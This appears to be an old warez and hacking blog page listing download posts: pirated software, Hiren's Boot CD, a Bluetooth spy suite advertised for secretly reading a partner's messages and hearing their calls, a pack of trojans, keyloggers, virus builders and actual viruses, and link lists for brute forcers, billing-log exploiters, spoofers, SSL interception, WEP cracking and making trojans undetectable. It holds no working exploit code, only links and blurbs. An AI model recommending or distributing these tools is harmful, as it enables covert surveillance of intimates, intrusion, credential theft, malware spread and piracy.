You must check ur system for the latest releases of virus Dropper hidden in Partition Table. I found of my office PC infection this week. The PCs are cleaned with several antivirus but infected even after fresh installation.
This MASTER PIECE CD caught the Problem and last 3 days no problem at all.


Download

Summitsoft Logo Design Studio v3.5 Final


Logo Design Studio Pro offers the greatest range of designer tools to help you quickly and easily create an identity from your own library of uniquely branded logos and graphic images. By modifying or importing images, shapes, graphic objects and text, each professionally designed logo included in the software is able to produce thousands of unique results - all in a matter of minutes! If your identity evolves or completely changes at any time, simply recreate a new company logo design at no additional cost.

Download

Hiren's Boot CD 9.6




Hiren's Boot CD is a boot CD containing various diagnostic programs such as partitioning agents,

system performance benchmarks, disk cloning and imaging tools, data recovery tools, MBR tools, BIOS tools,

and many others for fixing various computer problems. It is a Bootable CD; thus, it can be useful even if

the primary operating system cannot be booted. Hiren's Boot CD has an extensive list of software. Utilities

with similar functionality on the CD are grouped together and seem redundant; however, they present choices

through UI differences.

All in one Dos Bootable CD which has all these utilities

Partition Tools
Partition Magic Pro 8.05
Best software to partition hard drive

Acronis Disk Director Suite 9.0.554
Popular disk management functions in a single suite

Paragon Partition Manager 7.0.1274
Universal tool for partitions

Partition Commander 9.01
The safe way to partition your hard drive,with undo feature

Ranish Partition Manager 2.44
a boot manager and hard disk partitioner.

The Partition Resizer 1.3.4
move and resize your partitions in one step and more.

Smart Fdisk 2.05
a simple harddisk partition manager
download:

http://rapidshare.com/files/151003707/Hirens.BootCD.9.6.zip

Ultimate bluetooth mobile phone spy software 2008


Ultimate bluetooth mobile phone spy software 2008


What is your partner up to? What are your colleagues at work talking about? What's your boss saying about you? What is the person next to you on the bus texting?

The very latest technology and programs to allow you to spy on any bluetooth enabled device, mobile phone, or laptop - our technology covers them all.

With our Pro-Edition Software you can now easily find out who your partner, business associates, and friends have been in contact with. Whether you are suspicious of an affair, or would just like information that will help progress your career, you can now do all of the following using your mobile phone, and the person you are targeting will not suspect a thing. Guaranteed!


VIEW CONTACTS LIST

READ TEXT MESSAGES (SMS)

VIEW CALLS MADE / CALLS RECIEVED

SET THE TARGET PHONE TO CALL YOU WHENEVER IT MAKES OR RECEIVES A CALL

VIEW PHOTOS

MANY MORE FUNCTIONS

ALL THE ABOVE INFORMATION CAN EASILY BE DOWNLOADED TO YOUR PHONE

MAKE CALLS VIA THE PHONE YOU HAVE TARGETED

Once the target phone has been remotely set you do not need to be in Bluetooth range to listen into calls.

There is no trace or logging of your phone's details on the target phone

That means: THEY WILL NEVER KNOW

No need to carry on wishing you knew what was going on..no need to wish you had those vital contact numbers..you can easily find out today. Why punish yourself any longer?

Think that your wife is secretly text messaging at night?

Or that your husband is making secret calls when you're not paying attention?

Ultimate Bluetooth Mobile Phone Spy Software Edition 2008 will work on All mobile devices that are bluetooth enabled. Not just phones but also laptops, computers, etc. YOU WILL RECEIVE SEPERATE SOFTWARE FOR OLD MODELS AND NEW MODELS (INCLUDING SYMBIAN PHONES). We don't need to list compatible phones - this works on ALL phones!

Check what your kids, spouse, or partner are up to - and rest at peace!

You will receive an entire suite of bluetooth spy software!!

Not just 1 program but an entire suite that will work on old phones, new phones, smart phones, java phones - on absolutely all of them!

NOTHING is logged, you leave absolutely NO TRACE of your spying activities!

This program is 100% software. You will NOT need to alter or modify your handset at all!

** This will work on all phones! ** Would be very surprise if this is true

Is your DAUGHTER wasting her time on that NO GOOD PUNK?

Is your PARTNER cheating on you and making secret calls in the bathroom?

Are your FAMILY members wasting too many unnecessary minutes on your PHONE CONTRACT?

Are your children TEXTING or TALKING on the phone when they should be doing their homework or household chores?

Frequently Asked Questions
Will this work in my country?
Yes! This product does not depend upon country or mobile network. It will work anywhere in the world!

Will I have to install any software on the phone(s) I wish to spy on?
No. This product only needs to be installed on your phone.

That means that in 5 minutes you can be checking any phone you want. That's right. If you buy this, it will take about 2 minutes to process the order and in about 1 minute you will receive an E-Mail with the download link. Download takes about 10 seconds and installation onto your phone takes about 1 or 2 minutes. And instantly you will be reading your wife's SMS/text messages, listening to your kid's phone conversation, even knowing what your boss or your neighbor is saying. All of this is done in stealth mode. This means they will never know that you are doing this. And this works on ALL phones. Samsung, Motorola, Nokia, Ericsson, Blackberry, absolutely all of them. This will work in all countries, on all networks.

Extra Bonus!

With your purchase you will get 2 extra bonus spy items!

* Bluetooth spy suite for your PC/laptop!
* A very special program that enables you to view incomming and outgoing e-mail for a given e-mail address.

You will get these two bonus items for absolutely free with your purchase of the Bluetooth Spy Software!

"This is one of the most phenomenal mobile phone technologies ever created and we here at E-Stealth.com pride ourselves in offering the world's top bluetooth spy suite package. I guarantee that you will absolutely love this product."

- Steve Barker, E-Stealth.com Director of Operations

This only works while Bluetooth is on. All of the statements were made by author. I have not tried it out.


DOWNLOAD:

Super MP3 Recorder. ( Record whatever your pc play ! )


Super Mp3 Recorder Professional, the powerful recorder, editor and player, makes a complete recording studio of your computer. With the recorder you can record voice from microphone, internet streaming audio, or music played by Winamp, Windows Media Player, Quick Time, Real Player, Flash, games, etc. Super Mp3 Recorder Pro is able to automatically detect the recording formats your sound card supports and then set the application's parameters for the best possible performance. The recordings can be saved as .mp3, .wav, .wma, .vqf and .ogg files. What makes Super Mp3 Recorder Pro more powerful is its editing feature. It can edit audio files as you desire by cutting, copying, pasting, trimming and various DSP effects. Another useful feature is recording schedule which enables automatic recording, that is, Super Mp3 Recorder Pro starts and stops recording at any time you want.

Super Mp3 Recorder Pro has a Voice Activation System with which you can choose to skip silent passages, or stop the recording after a certain amount of silence. This option is especially useful when you're recording streaming audio and net congestion temporarily stops the stream. Instead of having a big blank spot in your recording, Super Mp3 Recorder Pro will just pause and wait for the signal to reappear.


Features:

:: Powerful Recorder:
Super Mp3 Recorder Pro can record any signal played through your sound card into Mp3, Wma, Vqf, Ogg or Wav files.

:: CD Quality Recordings:
With its powerful sound engine Super Mp3 Recorder Pro produces CD quality recordings.

:: Audio File Editing:
Super Mp3 Recorder Pro can edit audio files as you desired by cutting, copying, pasting, trimming and various DSP effects.

:: Recording Schedule:
Super Mp3 Recorder Pro can start and stop recording at any time you set.

:: Easy-to-use User-friendly Interface:
Most functions can be called up with a simple mouse click or menu selection.

:: Flexible Setting:
Super Mp3 Recorder Pro is able to automatically detect the recording formats your sound card supports and then set the application's parameters for the best possible performance. The default parameters work in most cases, but you can change them easily to best suit your needs.

:: Record Volume Control Support:
Super Mp3 Recorder Pro integrates the complete set of record volume control for your convenience.

:: Direct-To-Disk Long Time Recording Support:
Super Mp3 Recorder can record on the fly for as long as your like without interrupt. It can record and save to an mp3 file in one operation instead of having to save it to a wav and then spend time converting.

:: Recording History Management:
Super Mp3 Recorder Pro enables you to manage recording files conveniently.

:: Voice Activation System:
Super Mp3 Recorder Pro has a Voice Activation System with which you can choose to skip silent passages, or stop the recording after a certain amount of silence.

:: Hotkey Support:
Super Mp3 Recorder Pro supports hotkey setting (F8 to start recording and F9 to stop recording by default).

:: Much, much more ...

http://letitbit.net/download/1ee56682768/U...et----.rar.html

Webroot Spy Sweeper 5.8.1.55



Spyware grows more sophisticated every day. There's more of it, and it's more malicious than ever before. Experts agree: Webroot Spy Sweeper delivers the most advanced spyware detection, blocking and removal available to beat dangerous spyware programs.



http://depositfiles.com/files/8407969

MSN Webcam Recorder v13.0


Goldenfoundsoft MSN Webcam Recorder v13.0 | 10.4 Mb

MSN Webcam Recorder is easy-to-use, fast, and powerful video-recording software. Record the full-screen, window, fixed-region.For AIM, ICQ, MSN, Yahoo Messenger, and Screen. The program loads the video compressors dynamically on your system for the best power and flexibility. audio can be recorded from any source, including microphone, line-in, or speakers.


You can install MSN Webcam Recorder on a computer running Microsoft Windows 2000, Windows XP, Windows Vista, or Windows Server 2003.

Software Requirement:
Msn Messenger

http://rapidshare.com/files/149507515/MSN....order.v13.0.zip

Real Spy Monitor 2.86 Full



Worried about how your PC is being used? Want to keep tabs on your children, spouse, employees? Need to Prevent your children or employee from some application or web sites? Real Spy Monitor is the full solution for you.

DOWNLOAD :

PASSWORD = wickedsoul@warezraid.com

AIO Crack Searching & Shareware Hacking 2008



AIO Crack Searching 2008 | English | 11 Mb


a- Crack Searching Programms:

1- Craagle v1.91
2- CrackDownloader Plus v2.2 (released 10/07/2005)
3- Serials3k
4- Crack Searcher
5- Crack Buster v1.3
6- Galaxy search
7- Crack Wizard

b- Shareware Hacking Programs:

1- Never Expire v2.0
2- Trial Doctor v1.3.1
3- Trial Reset v2.5
4- MicroBest CrackLock v3.8.4
5- Date Cracker 2000
6- Date Facker 32
7- Date Hacking v1.2

c- AIO eBook bonus:

Beginner Olly Cracking Tutorials
[9 detailed step-by-step tutorials]

Beginner tutorial 1: Serial fishing
Beginner tutorial 2: Internal Keygen and Patching
Beginner tutorial 3: Unpacking and Patching
Beginner tutorial 4: unpacking and patching, a more complex case v.1.1
Beginner Tutorial 5: Inline Patching
Beginner Tutorial 6: Packers theory v1.1
Beginner Tutorial 7: Cracking using Memory BP's
Beginner Tutorial 8: Breakpoints Theory v1.2
Beginner Tutorial 9: Defeating Magic Byte Protection

Download link

Hacking with all basics...........

PPTP VPN MITMA

http://crimemachine.com/Tuts/Flash/pptp-vpn.html

Use "Auditor" Remote Exploit or you could do it on whax but you'll need to down load a few extra bits and peices. Google search "Knoppix Remote Exploit", then download it, It's about 500+ mb....It's a CD live distro and it is probably better than Whax, just about...

[edited]or dwnld here:
http://new.remote-exploit.org/index.php/Main_Page


How to decrypt SSL encrypted traffic using a MITMA
http://www.crimemachine.com/Tuts/Flash/SSLMITM.html



SSL MITM attacks
hxxp://eks0.free.fr/whax-demos/?f=Whoppix-ssl-mitm_config.xml
Another video tut of a different to the decryption one...



UUMmmmm.......................I think it's

ssh tunneling, with use of Nikto and mfscli exploits.. Might be wrong and can't be aresd to check it out though...But it's good...
http://whoppix.hackingdefined.com/Whoppix-ssh-dcom.html



A quick tut on making your trojans completely undetecable by hand, using Ollydbg (the pro way) LOL...good tut and it works....
hxxp://www.h2kclan.com/forum/index.php?action=dlattach;topic=30238.0;attach=39032

+
Example code/trojans that he uses to practise on....
hxxp://www.h2kclan.com/forum/index.php?action=dlattach;topic=30238.0;attach=39033



Right I've just relised this is in completely the wrong place....Unix-Linuix Systems is not for hacking tutorials.....never mind


128bit WEP cracking
hxxp://www.crimemachine.com/Tuts/Flash/wepcracking.html

Mad how easy it is!!



Basic introduction to the Nessus security scanner using Auditor Security Collection

hxxp://www.irongeek.com/i.php?page=videos/nessus



Basic introduction network mapping using nmap
not expecting many of you to need this..

hxxp://www.irongeek.com/i.php?page=videos/nmap1



Cracking Syskey and the SAM on Windows Using Samdump2 and John

hxxp://www.irongeek.com/i.php?page=videos/samdump2auditor



FTP Bruteforcing and the use of the raptor exploit (I think)

hxxp://eks0.free.fr/whax-demos/?f=raptor_config.xml



Autoscan + Metasploit

hxxp://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml





................
linux_dude
Jul 19 2005, 04:23 AM
Argh, this reeks of script kiddie-ism :-/

This place isn't a repository for how-to guides, but we'll see what ComSec says, besides, these aren't anything new.

Do you even read what you post?

Example:
For the SSL Man in the Middle Attack, you don't need access to the victims computer. If you did, that wouldn't be very 'in the middle', now would it? You just need access to their network.

Honestly, it's nice, but it's so specific and contrived, that it won't work in most cases. You're issuing an invalid certificate, which some users would notice, and if you just sniff the traffic, you can't crack it easily.


Another thing, the 128bit cracking only works in high traffic areas, otherwise it isn't that easy. (7 GB of traffic on average) :-/

You could forcefully generate the traffic yourself but most routers detect this, and so do the network users when they repeatedly get disassociated with the AP.


Posted by crazy_netz at 10:39 PM 0 comments

The Most Wanted Hacking Tools 2009

Dictionary tool:

MagicFilter
Code:

http://www.freewebs.com/t800t/MagicFilter.rar

Raptor3 [ belt sinicizes patch ]
Code:

http://www.freewebs.com/t800t/Raptor3.zip


The SuperDic_V3.2 registration version [ easy superior super dictionary production tool, function to be good ]
Code:

http://www.freewebs.com/t800t/SuperDic_V32.zip


Pwdmaker_1.151
Code:

http://www.freewebs.com/t800t/pwdmaker_1.151.rar


Decodes the tool: John the Ripper
Code:

http://www.xisp.org/downloads/jtr.zip


AUthX
Code:

http://www.freewebs.com/t800t/AUthX.rar



Withdraws the password and processes the LOG files tool:

Z_nakeR2 [ very good log processing tool may process the many kinds of log documents ]
Code:

http://www.freewebs.com/t800t/Z_nakeR2.zip


ccbrip
Code:

http://www.xisp.org/downloads/ccbillrip.zip


ibillrip
Code:

http://www.xisp.org/downloads/ibillrip.zip



*Accessdiver (AD) by Jean Fages
Code:

http://www.accessdiver.com


*Sentry by Sentinel:
Code:

http://sentinel.deny.de/sentry.php


*Form@ (specifically for FORM sites) by SSS -
Code:

http://sss.deny.de/


Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
Code:

http://sentinel.deny.de/Caecus.php


Ares by Gamoaa -
Code:

http://www.xisp.org/downloads/FACE_Setup.zip


Brutus
Code:

http://www.hoobie.net/brutus/


AuthForce by Zachary P. Landau
Code:

http://kapheine.hypa.net/authforce/index.html


Entry by Sparkleware
Code:

http://www.sparkleware.com/entry/index.html


Xavior By LithiumSoft
Code:

http://www.btinternet.com/~lithiumsoft/Products.html


Web Password Checker (WPC) .1 For UNIX by g1soft
available @
Code:

http://www.securityfocus.com/tools/885/scoreit


Munga Bunga's http Brute Forcer by Munga Bunga
Code:

http://www.hackology.com


Wordlist Tools:

*Raptor 3 by Madmax -
Code:

http://madmax.deny.de/downloads/raptor.zip


Words Extractor
Code:

http://www.intellitamper.com/wordsextractor/


Lucifer by Rhino -
Code:

http://rhino.deny.de/lucifer.php


ALS_novice by Wolfman -
Code:

http://wolfman.deny.de/tools.html


Z-leecher by Beda
Code:

http://goldmaster.webpark.cz/sleech.html


S-Generator by Beda
Code:

http://goldmaster.webpark.cz/sgen.html


S-WordlistTool by Beda
Code:

http://goldmaster.webpark.cz/swordt.html


Proxy Tools:

*Proxyrama By Gaamoa -
Code:

http://gaamoa.deny.de/


*Charon by Rhino -
Code:

http://www.icefortress.com/hosts/rhino/


*Advanced Proxy Leecher (APL) by Sentinel-
Code:

http://sentinel.deny.de/apl.htm


Geowhere by Jean Fages (NOT-Freeware) -
Code:

http://www.geowhere.net/


Proxy List Filter -
Code:

http://www.freeproxy.ru/en/programs/proxy_filter.htm


AATools by Glocksoft
Code:

http://www.glocksoft.com/aatools.htm


Proxy Bag
Code:

http://www.intellitamper.com/proxybag/


S-Proxy Tool by Beda
Code:

http://goldmaster.webpark.cz/sproxy.html


Exploiting Tools:

*Triton (Scanner) by Rhino -
Code:

http://rhino.deny.de/triton/index.php


*CMX IV by Xtremnet -
Code:

http://xtremet.deny.de/products.htm


CCBill Local Cgi Exploiter By Ksoze-
Code:

http://ksoze.deny.de/ccbill_exp.html


IBT2 by wolfman:
Code:

http://wolfman.deny.de/tools.html


Hephaestus's Ashen Spear by Wolfman:
Code:

http://wolfman.deny.de/HAS.php


Intellitamper
Code:

http://www.intellitamper.com/infos.php


Putty
Code:

http://www.chiark.greenend.org.uk/~sgtatham/putty/


Decrypting Tools:

*John The Ripper (JTR) -
Code:

http://www.openwall.com/john/


MDcrack (MD5 Cracker) -
Code:

http://membres.lycos.fr/mdcrack/


Distributed John The Ripper by Luis Parravicini
Code:

http://ktulu.com.ar/en/djohn.php


Cain and Abel by Massimiliano Montoro
Code:

http://www.oxid.it/cain.html


Salt Grinder by Wolfman
Code:

http://wolfman.deny.de/SaltGrinder.php


Log Tools:

LogRip by Rhino -
Code:

http://rhino.deny.de/logrip.php


Azarius by Rhino -
Code:

http://rhino.deny.de/azarius.php


Zimapass Parser by Sentinel:
Code:

http://sentinel.deny.de/zimaparser.htm


*C-Parse (ccbill.log parser) by Sentinel:
Code:

http://sentinel.deny.de/c_parse.htm


CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
Code:

http://membres.lycos.fr/ccbill/


Accessdiver/Ares Parser by Sentinel:
Code:

http://sentinel.deny.de/ad_ares_parser.htm




Spoofers:

Zspoof by wolfman -
Code:

http://wolfman.deny.de/tools.html


Sploof by Jean Fages -
Code:

http://www.accessdiver.com/sploof.htm


Final Spoof
Code:

http://www.beatharness.com/finalspoof/


Spooph by nast0
Code:

http://24.106.100.133/spooph/index.html


D-Spoof And Others (Russian Site, English Prog)
Code:

http://mspoofer.pisem.net/zaza/index.htm


Mikho's Online Spoofer (web based spoofer)
Code:

http://mikho.kicks-ass.net/spoofs/spoofs.hta


QuickSpoof
Code:

http://httpd.chello.nl/~m-koster2/spoofs.htm


Other Tools:

Code:

Scholar by Sentinel - (History checker)
http://sentinel.deny.de/scholar.htm


Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
Code:

http://xtremet.deny.de/products.htm

Ethical Hacking Resources..........

A very nice post in a thread by SpOonWiZaRd

Well, first up, you will have to read up on alot of things like:
http://www.google.com/search?q=Cryptography
http://www.google.com/search?q=Brute Forcing
http://www.google.com/search?q=Dictionary Attacks
http://www.google.com/search?q=Sniffing
http://www.google.com/search?q=Telnet
http://www.google.com/search?q=FTP
http://www.google.com/search?q=Gopher
http://www.google.com/search?q=TCP/...s and Protocols

Get the right software and learn how to use them

Go to these sites and get the tools:

http://www.oxid.it. (Get Cain & Abel)
http://www.elhacker.net (Get lots of hacking tools)
http://www.packetstorm.org (More tools)
http://www.milw0rm.com (Submit hashes to them to crack)
Http://www.paulschou.com/tools/xlate (Binary to almost anything converter)
http://www.hnc3k.com (Lots of tutorials like elhacker.net)
http://www.darknet.org.uk
http://www.hellboundhackers.org (Site that gives you challenges) Practical
http://www.hackthissite.org (Same as Hellboundhackers)
http://www.packetstormsecurity.com (Every tool or dictionary you will need)
http://www.freerainbowtables.com (Rainbowtables download)
http://www.rainbowtables-online.com (Online cryptanalysis cracking site)
http://www.ophcrack.org (Get ophcrack and ophcrack tables)
http://www.hoobie.net (Get brutus and lots lots lots of exploits)
http://www.hackology.com (Get more tools)
http://www.l0pht.com (cracking site)
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack (more ophcrack tables)
http://www.hackaday.com (very good hacking site with lots of hacks)
http://www.killsometime.com (for those long cracking hours)
http://www.security-hacks.com (exactly what it says)
http://www.devshed.com/c/b/Security/ (alot of security tutorials)
http://www.devshed.com/c/b/JavaScript/ (Javascript read abouts)
http://johnny.ihackstuff.com/downloads/ (very cool hacking downloads!)
http://www.hackershomepage.com/ (all about hacking and the latest tools)
http://www.audreyhacking.com/wiki/index.php/Main_Page (more toolz)
http://softreflex.com/search.php?q=wwwhack (helps you find toolz easier than google)
http://www.piratebay.org (basically anything you want, be it music or what ever!)
http://hackers-grounded.com (a very resourceful site given by XXXImmortalXXX)
http://sectools.org/crackers.html (Top 10 Password Crackers)

password cracking guide

The goal is to unify all of the good information found in various bits and pieces into 1 large document. This document is for people who want to learn to the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempted doing anything documented here. I do my best to provide step by step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you find the information. In those cases someone else has done what I attempting and did a good or great job and I didn’t want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, irongeek, PrairieFire, and stasik. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum.

I had to compress the document so I could attach it. The document as it stands now is 56K. Please let me know if what I have is wrong, or if there is a better way to do something, or if I am missing something. I am planning on making enhancements as people make me aware of them.

Here is the table of contents
1 LM vs. NTLM
2 Dumping the SAM and cracking the password using BackTrack
2.1 Dumping the SAM from inside BackTrack
2.2 Dumping Cached Credentials from BackTrack
2.3 Cracking the LM hash using john the ripper
2.4 Cracking the LM hash using mdcrack
2.5 Cracking the NTLM hash using john the ripper
2.5.1 Cracking the NTLM hash using the results from cracking the LM hash using john the ripper
2.6 Cracking the NTLM hash using mdcrack
2.6.1 Cracking the NTLM hash using the results from cracking the LM hash using mdcrack
2.7 Cracking the LM hash using ophcrack
2.8 Cracking the NTLM hash using ophcrack
3 Dumping the SAM and cracking the password using applications in Windows
3.1 Dumping the SAM from windows
3.1.1 Dumping the SAM from windows using pwdump7
3.1.2 Dumping the SAM from windows using fgdump
3.2 Dumping Cached Credentials from windows
3.3 Cracking the LM hash using john the ripper
3.4 Cracking the LM hash using mdcrack
3.5 Cracking the NTLM hash using john the ripper
3.6 Cracking the NTLM hash using mdcrack
3.6.1 Cracking the NTLM hash using the results from cracking the LM hash using mdcrack
3.7 Cracking the LM hash using ophcrack (requires high speed internet access during install)
3.8 Cracking the NTLM hash using ophcrack
3.9 Cracking the LM and NTLM hash using Cain and Able
4 Cracking the LM and NTLM hashes using the ophcrack LiveCD
5 plain-text.info
6 Active Directory
7 Resetting a forgotten password on a local user account (NOT A DOMAIN ACCOUNT)
8 Novell
9 Cracking Linux/Unix passwords using John the Ripper
10 Cracking equipment passwords using Hydra in BackTrack
11 Cracking equipment passwords using Brutus in windows
12 Cracking Oracle 11g (sha1)
13 Cracking Oracle passwords over the wire
14 Syskey
15 Wordlists aka Dictionary attack
15.1 Using John the Ripper to generate a wordlist
15.2 Configuring John the Ripper to use a wordlist
15.3 Using crunch to generate a wordlist
15.4 Using premade wordlists
15.5 Other wordlist generators
15.6 Manipulating your wordlist
16 Rainbow Tables
16.1 What are they?
16.2 Generating your own
16.2.1 rcrack - obsolete but works
16.2.2 rcracki - new but doesn't work
16.2.3 Generating a rainbow table
16.3 WEP cracking
16.4 WPA-PSK


Download

Hacking Gmail


and Gmail fans This is serious, down-and-dirty, under-the-hood, code-level hacking that will have readers eliminating the default settings, customizing appearance, disabling advertising, and taking control over their Gmail accounts Covers turning Gmail into an online hard drive for backing up files, using it as a blogging tool, and even creating customized Gmail tools and hacks Shows readers how to check their Gmail without visiting the site; use Gmail APIs in Perl, Python, PHP, and other languages, or create their own; and maximize Gmail as a host for message boards, photo galleries, even a blog

Download:

Hacking Exposed Web Applications 2nd


Hacking Exposed Web Applications, Second Edition by Stuart McClure, Joel Scambray and George Kurtz | 390 pages | pdf | 4 MB |

Since 1999, Hacking Exposed has educated millions of readers about the ease of hacking into computer networks and systems. Hacking Exposed: Web Applications 2 shows you how to meet this challenge with the two-pronged approach adapted from the original Hacking Exposed, the best-selling digital security book of all time.


Donload

Top 10 Vital Hacking Sof7ware and Tools




Additionally, WindowBlinds 6 adds full support for customizing Microsoft?s new Windows Vista operating system. Everything from Internet Explorer 7 skinning, Sidebar skinning to explorer backgrounds, WindowBlinds 6 skins virtually every element of Windows Vista while making full use of the hardware acceleration features on Windows Vista for maximum performance.
The new version also adds a host of other features including advanced animation support in skins, user-creatable skin sub-styles, a new, easy to use configuration program, user customization options of fonts and colors in skins and much more.

WindowBlinds is safe and easy to use. It doesn't alter any system files and users can switch between the default Windows look and feel and a custom WindowBlinds skin with the click of a button. In addition, WindowBlinds has been tested to ensure it works with Windows Vista, so you know it is compatible, reliable, and more secure.

Stardock WindowBlinds will let you apply thousands of different skins (visual styles) to change the look and feel of your entire desktop. WindowBlinds is so flexible that users can create skins that mimic the look and feel of other operating systems. Even with thousands of different visual styles to choose from, you can customize those visual styles as well. WindowBlinds gives you total control over your graphical user interface. WindowBlinds will let you change the color of your Windows GUI, change your wallpaper, give different windows their own specific look, choose a new Windows taskbar and Start button.

WindowBlinds doesn't just make Windows look better, it can make it more functional. You can create your own skins that add additional buttons to the title bar that provide additional functionality such as roll-up buttons, link buttons, program short cuts, even media player controls. Moreover, because WindowBlinds uses the latest features of your graphics card, it can make Windows even faster than the default Windows XP or Aero style.

Features:
- New start menu animation support
- Category filtering on skins in wbconfig
- Tag filtering on wallpapers in wbconfig
- Random skin support
- The ability to save a re-coloring of a skin as a preset
- Advanced HSL re-coloring where you pick a single color and a range in a skin and you can just change that color instead of the entire skin
- Ability to edit the system colors from wbconfig
- Ability to change skin fonts from wbconfig
- Ability to control transparency and blur on start menu, menus, taskbar and window frames. Has some limitations on XP
- Ability to save such changes as a preset
- Vista-Ize me function which sets some defaults to have a more vista like look
- Ability to skin the sidebar
- Ability to edit a sidebar skin from within wbconfig
- Improved WB skin install when handling upgrades of skins
- Ability to alter the mouse over animation speed
- Ability to alter the default button pulsing speed
- Support for explorer background bitmaps
- Ability to use the Aero frames with the rest of the skin
- Blur support in title bars (and menus on vista)
- Lots of new sections for new Vista specific parts
- Including IE navigation arrows, IE tabs, start menu shutdown/lock buttons
- Skins virtually every aspect of the Windows GUI
- Clean and easy configuration dialog.
- Tons of configuration options for users
- Animation supported on titlebars, buttons, and many other elements.
- Change the color of any visual style on the fly
- Per-application visual styles
- Doesn't alter any system files
- Safe, reliable way to change the look and feel of Windows

Download

Ultimate Hacking Experience (2008)



Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++- Curiosity
- Keylogger
- KeyCopy
Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner
WebHacks/WordLists
Brute Forcers
- Munga Bunga 's Official
- Brutus
- Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz
- Unix- Wbrute.tar.gz
- Unix- Shadow Scanner
-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz
- Unix
CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
Virus!
Viruses
- Hippi virus
- Sasser- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builders
- DR VBS
- VBSwg 2 beta
- Virus builder
- p0ke's WormGen 2.0
- RESIDUO
- DoS Virus
MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- ~censored~ Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1
- 56k
- Panther Mode2
- ISDN +
- Final Fortune v2.4
- Battle Pong
- Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2
EXTRA!
- Telnet Tutorial

RarPAss:
www.super-warez.com
Download
http://rapidshare.com/files/99294302/Ultimate_hack_2008_killinG_Machine_.rar

Mobile BlueTooth Hacking and Extras (AIO)



Mobile BlueTooth Hacking and Extras (AIO) | 13 MB
Hack the bluetooth with this awesome package:
Super Bluetooth Hack

Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
"Call from his phone" it includes all call functions like hold etc.
Super Bluetooth Hack for S60 2nd-3rd devices.

Works very well on Sony Ericsson and Nokia phones


Download
Or
Download

Hacking PSP




Hacking PSP PDF | English | 339 Pages | 8 MB

Download Link: